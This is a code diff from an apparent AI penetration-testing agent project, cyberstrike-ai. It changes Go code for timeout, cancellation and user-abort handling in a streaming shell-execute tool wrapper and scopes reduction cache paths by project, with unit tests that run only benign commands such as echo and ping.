// WithTimeout 到期后 local 侧常报 canceled / exit -1,但 execCtx.Err() 仍为 DeadlineExceeded。
func einoExecuteRecvErrIsToolTimeout(rerr error, tctx context.Context) bool {
if tctx != nil && errors.Is(tctx.Err(), context.DeadlineExceeded) {
return true
}
return errors.Is(rerr, context.DeadlineExceeded)
}
// einoStreamingShellWrap 包装 Eino filesystem 使用的 StreamingShellcloudwego eino-ext local.Local)。 // einoStreamingShellWrap 包装 Eino filesystem 使用的 StreamingShellcloudwego eino-ext local.Local)。
// 官方 execute 工具默认走 ExecuteStreaming 且不设 RunInBackendGround;末尾带 & 时子进程仍与管道相连, // 官方 execute 工具默认走 ExecuteStreaming 且不设 RunInBackendGround;末尾带 & 时子进程仍与管道相连,
// streamStdout 按行读取会在无换行输出时长时间阻塞(与 MCP 工具 exec 的独立实现不同)。 // streamStdout 按行读取会在无换行输出时长时间阻塞(与 MCP 工具 exec 的独立实现不同)。
@@ -53,7 +64,7 @@ type einoStreamingShellWrap struct {
// toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。 // toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。
toolTimeoutMinutes int toolTimeoutMinutes int
// recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。 // recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。
recordMonitor func(command, stdout string, success bool, invokeErr error) recordMonitor func(toolCallID, command, stdout string, success bool, invokeErr error)
} }
func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) { func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
@@ -71,27 +82,48 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
req.Command = prependPythonUnbufferedEnv(req.Command) req.Command = prependPythonUnbufferedEnv(req.Command)
tid := strings.TrimSpace(compose.GetToolCallID(ctx)) tid := strings.TrimSpace(compose.GetToolCallID(ctx))
agentTag := strings.TrimSpace(w.einoAgentName) agentTag := strings.TrimSpace(w.einoAgentName)
convID := mcp.MCPConversationIDFromContext(ctx)
execReg := mcp.EinoExecuteRunRegistryFromContext(ctx)
execCtx := ctx execCtx, execCancel := context.WithCancel(ctx)
var execCancel context.CancelFunc var timeoutCancel context.CancelFunc
if w.toolTimeoutMinutes > 0 { if w.toolTimeoutMinutes > 0 {
execCtx, execCancel = context.WithTimeout(ctx, time.Duration(w.toolTimeoutMinutes)*time.Minute) execCtx, timeoutCancel = context.WithTimeout(execCtx, time.Duration(w.toolTimeoutMinutes)*time.Minute)
}
if execReg != nil && convID != "" {
execReg.RegisterActiveEinoExecute(convID, execCancel)
} }
sr, err := w.inner.ExecuteStreaming(execCtx, &req) sr, err := w.inner.ExecuteStreaming(execCtx, &req)
if err != nil { if err != nil {
if timeoutCancel != nil {
timeoutCancel()
}
if execCancel != nil { if execCancel != nil {
execCancel() execCancel()
} }
if einoExecuteRecvErrIsToolTimeout(err, execCtx) {
hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n"
if w.recordMonitor != nil {
w.recordMonitor(tid, userCmd, hint, false, context.DeadlineExceeded)
}
if w.invokeNotify != nil && tid != "" {
w.invokeNotify.Fire(tid, "execute", agentTag, false, hint, context.DeadlineExceeded)
}
return schema.StreamReaderFromArray([]*filesystem.ExecuteResponse{{Output: hint}}), nil
}
if w.recordMonitor != nil { if w.recordMonitor != nil {
w.recordMonitor(userCmd, "", false, err) w.recordMonitor(tid, userCmd, "", false, err)
} }
if w.invokeNotify != nil && tid != "" { if w.invokeNotify != nil && tid != "" {
w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err) w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err)
} }
return nil, err return nil, err
} }
if sr == nil || w.invokeNotify == nil || tid == "" { if sr == nil || w.invokeNotify == nil {
if timeoutCancel != nil {
timeoutCancel()
}
if execCancel != nil { if execCancel != nil {
execCancel() execCancel()
} }
@@ -100,14 +132,34 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
outR, outW := schema.Pipe[*filesystem.ExecuteResponse](32) outR, outW := schema.Pipe[*filesystem.ExecuteResponse](32)
go func(inner *schema.StreamReader[*filesystem.ExecuteResponse], command string, cancel context.CancelFunc, tctx context.Context) { go func(inner *schema.StreamReader[*filesystem.ExecuteResponse], command string, cancel context.CancelFunc, timeoutCleanup context.CancelFunc, tctx context.Context, conversationID string, reg mcp.EinoExecuteRunRegistry) {
defer inner.Close() var innerCloseOnce sync.Once
closeInner := func() {
innerCloseOnce.Do(func() { inner.Close() })
}
defer closeInner()
if timeoutCleanup != nil {
defer timeoutCleanup()
}
if cancel != nil { if cancel != nil {
defer cancel() defer cancel()
} }
if reg != nil && conversationID != "" {
defer reg.UnregisterActiveEinoExecute(conversationID)
}
// ctx 取消时关闭内层流,避免 amass 等长时间无换行输出时 Recv 永久阻塞。
stopWatch := make(chan struct{})
go func() {
select {
case <-tctx.Done():
closeInner()
case <-stopWatch:
}
}()
defer close(stopWatch)
var sb strings.Builder var sb strings.Builder
const maxCapture = 16 * 1024
success := true success := true
var invokeErr error var invokeErr error
exitCode := 0 exitCode := 0
@@ -121,6 +173,15 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
if rerr != nil { if rerr != nil {
success = false success = false
invokeErr = rerr invokeErr = rerr
// 单次 execute 超时须与 MCP 工具一致:写入工具结果尾标、继续迭代,不得向 ADK 流注入硬错误。
if einoExecuteRecvErrIsToolTimeout(rerr, tctx) {
invokeErr = context.DeadlineExceeded
break
}
if errors.Is(rerr, context.Canceled) || (tctx != nil && errors.Is(tctx.Err(), context.Canceled)) {
invokeErr = context.Canceled
break
}
_ = outW.Send(nil, rerr) _ = outW.Send(nil, rerr)
break break
} }
@@ -130,15 +191,10 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
exitCode = *resp.ExitCode exitCode = *resp.ExitCode
} }
var appended string var appended string
if remain := maxCapture - sb.Len(); remain > 0 { if resp.Output != "" {
out := resp.Output sb.WriteString(resp.Output)
if len(out) > remain { appended = resp.Output
out = out[:remain]
}
sb.WriteString(out)
appended = out
} }
// 仅推送写入 sb 的片段,与末尾 Fire/recordMonitor 的截断累计一致,避免最终 tool_result 短于已展示增量。
if w.outputChunk != nil && strings.TrimSpace(appended) != "" { if w.outputChunk != nil && strings.TrimSpace(appended) != "" {
w.outputChunk("execute", tid, appended) w.outputChunk("execute", tid, appended)
} }
@@ -160,6 +216,21 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
success = false success = false
invokeErr = context.DeadlineExceeded invokeErr = context.DeadlineExceeded
} }
// 用户「中断并继续」终止 execute:合并说明进工具结果(与 MCP CancelToolExecutionWithNote 一致)。
partialStreamed := sb.String()
var abortNote string
if reg != nil && conversationID != "" && (invokeErr != nil || errors.Is(tctx.Err(), context.Canceled)) {
if note := reg.TakeEinoExecuteAbortNote(conversationID); note != "" {
abortNote = note
merged := mcp.MergePartialToolOutputAndAbortNote(partialStreamed, note)
sb.Reset()
sb.WriteString(merged)
if invokeErr == nil {
success = false
invokeErr = context.Canceled
}
}
}
// ADK 从本 Pipe 拼出 tool 消息正文;仅 Notify 尾标不会进入模型上下文。超时句写入流,与 UI 一致。 // ADK 从本 Pipe 拼出 tool 消息正文;仅 Notify 尾标不会进入模型上下文。超时句写入流,与 UI 一致。
if invokeErr != nil && errors.Is(invokeErr, context.DeadlineExceeded) { if invokeErr != nil && errors.Is(invokeErr, context.DeadlineExceeded) {
hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n" hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n"
@@ -167,20 +238,22 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
if w.outputChunk != nil && tid != "" { if w.outputChunk != nil && tid != "" {
w.outputChunk("execute", tid, hint) w.outputChunk("execute", tid, hint)
} }
if remain := maxCapture - sb.Len(); remain > 0 { sb.WriteString(hint)
h := hint }
if len(h) > remain { // 中断时循环内已逐行写入 stdout;此处只追加 USER INTERRUPT NOTE,避免整段输出重复。
h = h[:remain] if invokeErr != nil && errors.Is(invokeErr, context.Canceled) && abortNote != "" {
} if partialStreamed != "" {
sb.WriteString(h) _ = outW.Send(&filesystem.ExecuteResponse{Output: "\n\n" + mcp.AbortNoteBannerForModel + "\n" + abortNote}, nil)
} else if text := strings.TrimSpace(sb.String()); text != "" {
_ = outW.Send(&filesystem.ExecuteResponse{Output: text + "\n"}, nil)
} }
} }
if w.recordMonitor != nil { if w.recordMonitor != nil {
w.recordMonitor(command, sb.String(), success, invokeErr) w.recordMonitor(tid, command, sb.String(), success, invokeErr)
} }
w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr) w.invokeNotify.Fire(tid, "execute", agentTag, success, sb.String(), invokeErr)
outW.Close() outW.Close()
}(sr, userCmd, execCancel, execCtx) }(sr, userCmd, execCancel, timeoutCancel, execCtx, convID, execReg)
return outR, nil return outR, nil
} }
@@ -0,0 +1,227 @@
package multiagent
import (
"context"
"errors"
"io"
"strings"
"testing"
"time"
"cyberstrike-ai/internal/einomcp"
"cyberstrike-ai/internal/mcp"
"github.com/cloudwego/eino/adk/filesystem"
"github.com/cloudwego/eino/schema"
)
type mockStreamingShell struct {
immediateErr error
recvErr error
output string
}
func (m *mockStreamingShell) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
if m.immediateErr != nil {
return nil, m.immediateErr
}
outR, outW := schema.Pipe[*filesystem.ExecuteResponse](4)
go func() {
defer outW.Close()
if strings.TrimSpace(m.output) != "" {
_ = outW.Send(&filesystem.ExecuteResponse{Output: m.output}, nil)
}
if m.recvErr != nil {
_ = outW.Send(nil, m.recvErr)
}
}()
return outR, nil
}
func TestEinoExecuteRecvErrIsToolTimeout(t *testing.T) {
tctx, cancel := context.WithTimeout(context.Background(), time.Millisecond)
defer cancel()
time.Sleep(2 * time.Millisecond)
<-tctx.Done()
if !einoExecuteRecvErrIsToolTimeout(context.Canceled, tctx) {
t.Fatal("expected canceled recv with deadline exec ctx to count as tool timeout")
}
if !einoExecuteRecvErrIsToolTimeout(context.DeadlineExceeded, nil) {
t.Fatal("expected DeadlineExceeded recv without tctx")
}
if einoExecuteRecvErrIsToolTimeout(errors.New("exit status 1"), context.Background()) {
t.Fatal("unexpected timeout for generic error")
}
}
func TestEinoStreamingShellWrap_ToolTimeoutImmediateErrIsSoft(t *testing.T) {
inner := &mockStreamingShell{immediateErr: context.DeadlineExceeded}
wrap := &einoStreamingShellWrap{
inner: inner,
toolTimeoutMinutes: 60,
}
sr, err := wrap.ExecuteStreaming(context.Background(), &filesystem.ExecuteRequest{Command: "true"})
if err != nil {
t.Fatalf("immediate tool timeout must return soft stream, got err: %v", err)
}
defer sr.Close()
var got strings.Builder
for {
resp, rerr := sr.Recv()
if errors.Is(rerr, io.EOF) {
break
}
if rerr != nil {
t.Fatalf("outer stream must not hard-fail, got: %v", rerr)
}
if resp != nil && resp.Output != "" {
got.WriteString(resp.Output)
}
}
if !strings.Contains(got.String(), einoExecuteTimeoutUserHint()) {
t.Fatalf("expected timeout hint, got: %q", got.String())
}
}
func TestEinoStreamingShellWrap_ToolTimeoutRecvErrIsSoft(t *testing.T) {
inner := &mockStreamingShell{recvErr: context.DeadlineExceeded}
notify := einomcp.NewToolInvokeNotifyHolder()
wrap := &einoStreamingShellWrap{
inner: inner,
invokeNotify: notify,
toolTimeoutMinutes: 60,
}
// 生产路径由 Eino compose 注入 toolCallID;单测通过已过期 execCtx 识别 tool_timeout 软错误。
tctx, cancel := context.WithTimeout(context.Background(), time.Millisecond)
defer cancel()
time.Sleep(2 * time.Millisecond)
<-tctx.Done()
sr, err := wrap.ExecuteStreaming(tctx, &filesystem.ExecuteRequest{Command: "sleep 999"})
if err != nil {
t.Fatalf("ExecuteStreaming: %v", err)
}
defer sr.Close()
var got strings.Builder
for {
resp, rerr := sr.Recv()
if errors.Is(rerr, io.EOF) {
break
}
if rerr != nil {
t.Fatalf("outer stream must not hard-fail on tool timeout, got: %v", rerr)
}
if resp != nil && resp.Output != "" {
got.WriteString(resp.Output)
}
}
if !strings.Contains(got.String(), einoExecuteTimeoutUserHint()) {
t.Fatalf("expected timeout hint in stream, got: %q", got.String())
}
}
func TestEinoStreamingShellWrap_CapturesOutputWithToolTimeout(t *testing.T) {
inner := &mockStreamingShell{output: "100\n"}
notify := einomcp.NewToolInvokeNotifyHolder()
var firedContent string
notify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
firedContent = content
})
wrap := &einoStreamingShellWrap{
inner: inner,
invokeNotify: notify,
toolTimeoutMinutes: 60,
}
sr, err := wrap.ExecuteStreaming(context.Background(), &filesystem.ExecuteRequest{Command: "echo 100"})
if err != nil {
t.Fatalf("ExecuteStreaming: %v", err)
}
defer sr.Close()
var got strings.Builder
for {
resp, rerr := sr.Recv()
if errors.Is(rerr, io.EOF) {
break
}
if rerr != nil {
t.Fatalf("unexpected stream error: %v", rerr)
}
if resp != nil && resp.Output != "" {
got.WriteString(resp.Output)
}
}
if !strings.Contains(got.String(), "100") {
t.Fatalf("stream output = %q, want contains 100", got.String())
}
if !strings.Contains(firedContent, "100") {
t.Fatalf("notify content = %q, want contains 100", firedContent)
}
}
func TestEinoStreamingShellWrap_AbortNoteDoesNotDuplicateStreamedOutput(t *testing.T) {
inner := &mockStreamingShell{output: "line1\nline2\n", recvErr: context.Canceled}
notify := einomcp.NewToolInvokeNotifyHolder()
wrap := &einoStreamingShellWrap{
inner: inner,
invokeNotify: notify,
}
reg := &abortNoteTestRegistry{note: "改成20次"}
ctx := mcp.WithEinoExecuteRunRegistry(
mcp.WithMCPConversationID(context.Background(), "conv-abort-dup"),
reg,
)
sr, err := wrap.ExecuteStreaming(ctx, &filesystem.ExecuteRequest{Command: "ping -c 10 baidu.com"})
if err != nil {
t.Fatalf("ExecuteStreaming: %v", err)
}
defer sr.Close()
var got strings.Builder
for {
resp, rerr := sr.Recv()
if errors.Is(rerr, io.EOF) {
break
}
if rerr != nil {
t.Fatalf("unexpected stream error: %v", rerr)
}
if resp != nil && resp.Output != "" {
got.WriteString(resp.Output)
}
}
out := got.String()
if strings.Count(out, "line1") != 1 || strings.Count(out, "line2") != 1 {
t.Fatalf("stream duplicated stdout: %q", out)
}
if !strings.Contains(out, "改成20次") {
t.Fatalf("stream missing abort note: %q", out)
}
}
type abortNoteTestRegistry struct {
note string
}
func (r *abortNoteTestRegistry) RegisterActiveEinoExecute(string, context.CancelFunc) {}
func (r *abortNoteTestRegistry) UnregisterActiveEinoExecute(string) {}
func (r *abortNoteTestRegistry) AbortActiveEinoExecute(string, string) bool { return false }
func (r *abortNoteTestRegistry) TakeEinoExecuteAbortNote(string) string { return r.note }
func TestEinoStreamingShellWrap_NonTimeoutRecvErrStillHard(t *testing.T) {
inner := &mockStreamingShell{recvErr: errors.New("broken pipe")}
wrap := &einoStreamingShellWrap{inner: inner}
sr, err := wrap.ExecuteStreaming(context.Background(), &filesystem.ExecuteRequest{Command: "true"})
if err != nil {
t.Fatalf("ExecuteStreaming: %v", err)
}
defer sr.Close()
_, rerr := sr.Recv()
if rerr == nil || errors.Is(rerr, io.EOF) {
t.Fatal("expected hard stream error for non-timeout failure")
}
}
@@ -96,6 +96,6 @@ func recordEinoADKFilesystemToolMonitor(
} }
id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr) id := ag.RecordLocalToolExecution(storedName, args, resultText, invErr)
if id != "" { if id != "" {
rec(id) rec(id, toolCallID)
} }
} }
+26 -39
View File
@@ -43,22 +43,6 @@ func sanitizeEinoPathSegment(s string) string {
return s return s
} }
// localPlantaskBackend wraps the eino-ext local backend with plantask.Delete (Local has no Delete).
type localPlantaskBackend struct {
*localbk.Local
}
func (l *localPlantaskBackend) Delete(ctx context.Context, req *plantask.DeleteRequest) error {
if l == nil || l.Local == nil || req == nil {
return nil
}
p := strings.TrimSpace(req.FilePath)
if p == "" {
return nil
}
return os.Remove(p)
}
func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) { func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
if alwaysVisible <= 0 || len(all) <= alwaysVisible+1 { if alwaysVisible <= 0 || len(all) <= alwaysVisible+1 {
return all, nil, false return all, nil, false
@@ -67,14 +51,7 @@ func splitToolsForToolSearch(all []tool.BaseTool, alwaysVisible int) (static []t
} }
func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbackAlwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) { func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbackAlwaysVisible int) (static []tool.BaseTool, dynamic []tool.BaseTool, ok bool) {
nameSet := make(map[string]struct{}, len(names)) nameSet := expandAlwaysVisibleNameSet(names)
for _, n := range names {
n = strings.TrimSpace(strings.ToLower(n))
if n == "" {
continue
}
nameSet[n] = struct{}{}
}
if len(nameSet) == 0 { if len(nameSet) == 0 {
return splitToolsForToolSearch(all, fallbackAlwaysVisible) return splitToolsForToolSearch(all, fallbackAlwaysVisible)
} }
@@ -87,9 +64,9 @@ func splitToolsForToolSearchByNames(all []tool.BaseTool, names []string, fallbac
info, err := t.Info(context.Background()) info, err := t.Info(context.Background())
name := "" name := ""
if err == nil && info != nil { if err == nil && info != nil {
name = strings.TrimSpace(strings.ToLower(info.Name)) name = info.Name
} }
if _, keep := nameSet[name]; keep { if toolMatchesAlwaysVisible(name, nameSet) {
static = append(static, t) static = append(static, t)
continue continue
} }
@@ -126,14 +103,26 @@ func mergeAlwaysVisibleToolNames(configured []string) []string {
return merged return merged
} }
func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddlewareConfig, convID string, loc *localbk.Local, logger *zap.Logger) (adk.ChatModelAgentMiddleware, error) { func reductionCacheRootDir(configuredBase, projectID, conversationID string) string {
base := strings.TrimSpace(configuredBase)
if base == "" {
base = filepath.Join("tmp", "reduction")
}
if pid := strings.TrimSpace(projectID); pid != "" {
return filepath.Join(base, "projects", sanitizeEinoPathSegment(pid))
}
conv := strings.TrimSpace(conversationID)
if conv == "" {
conv = "default"
}
return filepath.Join(base, "conversations", sanitizeEinoPathSegment(conv))
}
func buildReductionMiddleware(ctx context.Context, mw config.MultiAgentEinoMiddlewareConfig, projectID, convID string, loc *localbk.Local, logger *zap.Logger) (adk.ChatModelAgentMiddleware, error) {
if loc == nil { if loc == nil {
return nil, fmt.Errorf("reduction: local backend nil") return nil, fmt.Errorf("reduction: local backend nil")
} }
root := strings.TrimSpace(mw.ReductionRootDir) root := reductionCacheRootDir(mw.ReductionRootDir, projectID, convID)
if root == "" {
root = filepath.Join(os.TempDir(), "cyberstrike-reduction", sanitizeEinoPathSegment(convID))
}
if err := os.MkdirAll(root, 0o755); err != nil { if err := os.MkdirAll(root, 0o755); err != nil {
return nil, fmt.Errorf("reduction root: %w", err) return nil, fmt.Errorf("reduction root: %w", err)
} }
@@ -171,6 +160,7 @@ func prependEinoMiddlewares(
einoLoc *localbk.Local, einoLoc *localbk.Local,
skillsRoot string, skillsRoot string,
conversationID string, conversationID string,
projectID string,
logger *zap.Logger, logger *zap.Logger,
) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) { ) (outTools []tool.BaseTool, extraHandlers []adk.ChatModelAgentMiddleware, toolSearchActive bool, err error) {
if mw == nil { if mw == nil {
@@ -190,7 +180,7 @@ func prependEinoMiddlewares(
if place == einoMWSub && !mw.ReductionSubAgents { if place == einoMWSub && !mw.ReductionSubAgents {
// skip // skip
} else { } else {
redMW, rerr := buildReductionMiddleware(ctx, *mw, conversationID, einoLoc, logger) redMW, rerr := buildReductionMiddleware(ctx, *mw, projectID, conversationID, einoLoc, logger)
if rerr != nil { if rerr != nil {
return nil, nil, false, rerr return nil, nil, false, rerr
} }
@@ -238,7 +228,7 @@ func prependEinoMiddlewares(
if mk := os.MkdirAll(baseDir, 0o755); mk != nil { if mk := os.MkdirAll(baseDir, 0o755); mk != nil {
return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk) return nil, nil, toolSearchActive, fmt.Errorf("plantask mkdir: %w", mk)
} }
ptBE := &localPlantaskBackend{Local: einoLoc} ptBE := newLocalPlantaskBackend(einoLoc)
pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir}) pt, perr := plantask.New(ctx, &plantask.Config{Backend: ptBE, BaseDir: baseDir})
if perr != nil { if perr != nil {
return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr) return nil, nil, toolSearchActive, fmt.Errorf("plantask: %w", perr)
@@ -253,17 +243,14 @@ func prependEinoMiddlewares(
return outTools, extraHandlers, toolSearchActive, nil return outTools, extraHandlers, toolSearchActive, nil
} }
func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, retry *adk.ModelRetryConfig, taskDesc func(context.Context, []adk.Agent) (string, error)) { func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, taskDesc func(context.Context, []adk.Agent) (string, error)) {
if ma == nil { if ma == nil {
return "", nil, nil return "", nil
} }
mw := ma.EinoMiddleware mw := ma.EinoMiddleware
if k := strings.TrimSpace(mw.DeepOutputKey); k != "" { if k := strings.TrimSpace(mw.DeepOutputKey); k != "" {
outputKey = k outputKey = k
} }
if mw.DeepModelRetryMaxRetries > 0 {
retry = &adk.ModelRetryConfig{MaxRetries: mw.DeepModelRetryMaxRetries}
}
prefix := strings.TrimSpace(mw.TaskToolDescriptionPrefix) prefix := strings.TrimSpace(mw.TaskToolDescriptionPrefix)
if prefix != "" { if prefix != "" {
taskDesc = func(ctx context.Context, agents []adk.Agent) (string, error) { taskDesc = func(ctx context.Context, agents []adk.Agent) (string, error) {
@@ -284,5 +271,5 @@ func deepExtrasFromConfig(ma *config.MultiAgentConfig) (outputKey string, retry
return prefix + "\n可用子代理(按名称 transfer / task 调用):" + strings.Join(names, "、"), nil return prefix + "\n可用子代理(按名称 transfer / task 调用):" + strings.Join(names, "、"), nil
} }
} }
return outputKey, retry, taskDesc return outputKey, taskDesc
} }
@@ -3,12 +3,31 @@ package multiagent
import ( import (
"context" "context"
"fmt" "fmt"
"path/filepath"
"strings"
"testing" "testing"
"github.com/cloudwego/eino/components/tool" "github.com/cloudwego/eino/components/tool"
"github.com/cloudwego/eino/schema" "github.com/cloudwego/eino/schema"
) )
func TestReductionCacheRootDir(t *testing.T) {
got := reductionCacheRootDir("", "proj-1", "conv-1")
want := filepath.Join("tmp", "reduction", "projects", "proj-1")
if got != want {
t.Fatalf("project scope: got %q want %q", got, want)
}
got = reductionCacheRootDir("", "", "conv-abc")
want = filepath.Join("tmp", "reduction", "conversations", "conv-abc")
if got != want {
t.Fatalf("conversation scope: got %q want %q", got, want)
}
custom := reductionCacheRootDir("/data/cache", "p1", "c1")
if !strings.HasSuffix(custom, filepath.Join("projects", "p1")) {
t.Fatalf("custom base should still scope by project, got %q", custom)
}
}
type stubTool struct{ name string } type stubTool struct{ name string }
func (s stubTool) Info(_ context.Context) (*schema.ToolInfo, error) { func (s stubTool) Info(_ context.Context) (*schema.ToolInfo, error) {
+14 -15
View File
@@ -7,6 +7,7 @@ import (
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"github.com/cloudwego/eino-ext/components/model/openai" "github.com/cloudwego/eino-ext/components/model/openai"
"github.com/cloudwego/eino/adk" "github.com/cloudwego/eino/adk"
@@ -29,7 +30,9 @@ type PlanExecuteRootArgs struct {
MwCfg *config.MultiAgentEinoMiddlewareConfig MwCfg *config.MultiAgentEinoMiddlewareConfig
// ConversationID is used for transcript/isolation paths in middleware. // ConversationID is used for transcript/isolation paths in middleware.
ConversationID string ConversationID string
Logger *zap.Logger DB *database.DB
ProjectID string
Logger *zap.Logger
// ModelName is used for model input token estimation logs. // ModelName is used for model input token estimation logs.
ModelName string ModelName string
// ExecPreMiddlewares 是由 prependEinoMiddlewares 构建的前置中间件(patchtoolcalls, reduction, toolsearch, plantask), // ExecPreMiddlewares 是由 prependEinoMiddlewares 构建的前置中间件(patchtoolcalls, reduction, toolsearch, plantask),
@@ -91,24 +94,20 @@ func NewPlanExecuteRoot(ctx context.Context, a *PlanExecuteRootArgs) (adk.Resuma
if a.SkillMiddleware != nil { if a.SkillMiddleware != nil {
execHandlers = append(execHandlers, a.SkillMiddleware) execHandlers = append(execHandlers, a.SkillMiddleware)
} }
// 4. summarization(最后,与 Deep/Supervisor 一致 // 4. pre-summarization normalize + continuation dedup, then summarization (与 Deep/Supervisor 一致)
if a.AppCfg != nil { if a.AppCfg != nil {
sumMw, sumErr := newEinoSummarizationMiddleware(ctx, a.ExecModel, a.AppCfg, a.MwCfg, a.ConversationID, a.Logger) sumMw, sumErr := newEinoSummarizationMiddleware(ctx, a.ExecModel, a.AppCfg, a.MwCfg, a.ConversationID, a.DB, a.ProjectID, a.Logger)
if sumErr != nil { if sumErr != nil {
return nil, fmt.Errorf("plan_execute executor summarization: %w", sumErr) return nil, fmt.Errorf("plan_execute executor summarization: %w", sumErr)
} }
execHandlers = append(execHandlers, sumMw) execHandlers = appendEinoChatModelTailMiddlewares(execHandlers, einoChatModelTailConfig{
} logger: a.Logger,
// 5. 孤儿 tool 消息兜底:必须挂在所有改写历史中间件(summarization/reduction/skill)之后、 phase: "plan_execute_executor",
// telemetry 之前,保证送入 ChatModel 的消息序列 tool_call ↔ tool_result 配对完整。 summarization: sumMw,
execHandlers = append(execHandlers, newOrphanToolPrunerMiddleware(a.Logger, "plan_execute_executor")) modelName: a.ModelName,
if teleMw := newEinoModelInputTelemetryMiddleware(a.Logger, a.ModelName, a.ConversationID, "plan_execute_executor"); teleMw != nil { conversationID: a.ConversationID,
execHandlers = append(execHandlers, teleMw) trace: a.ModelFacingTrace,
} })
if a.ModelFacingTrace != nil {
if capMw := newModelFacingTraceMiddleware(a.ModelFacingTrace); capMw != nil {
execHandlers = append(execHandlers, capMw)
}
} }
executor, err := newPlanExecuteExecutor(ctx, &planexecute.ExecutorConfig{ executor, err := newPlanExecuteExecutor(ctx, &planexecute.ExecutorConfig{
Model: a.ExecModel, Model: a.ExecModel,
+20 -30
View File
@@ -11,6 +11,7 @@ import (
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/einomcp" "cyberstrike-ai/internal/einomcp"
"cyberstrike-ai/internal/openai" "cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/project" "cyberstrike-ai/internal/project"
@@ -32,8 +33,10 @@ func RunEinoSingleChatModelAgent(
appCfg *config.Config, appCfg *config.Config,
ma *config.MultiAgentConfig, ma *config.MultiAgentConfig,
ag *agent.Agent, ag *agent.Agent,
db *database.DB,
logger *zap.Logger, logger *zap.Logger,
conversationID string, conversationID string,
projectID string,
userMessage string, userMessage string,
history []agent.ChatMessage, history []agent.ChatMessage,
roleTools []string, roleTools []string,
@@ -58,10 +61,12 @@ func RunEinoSingleChatModelAgent(
var mcpIDsMu sync.Mutex var mcpIDsMu sync.Mutex
var mcpIDs []string var mcpIDs []string
recorder := func(id string) { mcpExecBinder := NewMCPExecutionBinder()
recorder := func(id, toolCallID string) {
if id == "" { if id == "" {
return return
} }
mcpExecBinder.Bind(toolCallID, id)
mcpIDsMu.Lock() mcpIDsMu.Lock()
mcpIDs = append(mcpIDs, id) mcpIDs = append(mcpIDs, id)
mcpIDsMu.Unlock() mcpIDsMu.Unlock()
@@ -75,29 +80,15 @@ func RunEinoSingleChatModelAgent(
return out return out
} }
toolOutputChunk := func(toolName, toolCallID, chunk string) {
if progress == nil || toolCallID == "" {
return
}
progress("tool_result_delta", chunk, map[string]interface{}{
"toolName": toolName,
"toolCallId": toolCallID,
"index": 0,
"total": 0,
"iteration": 0,
"source": "eino",
})
}
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder() toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder) einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder)
mainDefs := ag.ToolsForRole(roleTools) mainDefs := ag.ToolsForRole(roleTools)
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, einoSingleAgentName) mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, nil, toolInvokeNotify, einoSingleAgentName)
if err != nil { if err != nil {
return nil, err return nil, err
} }
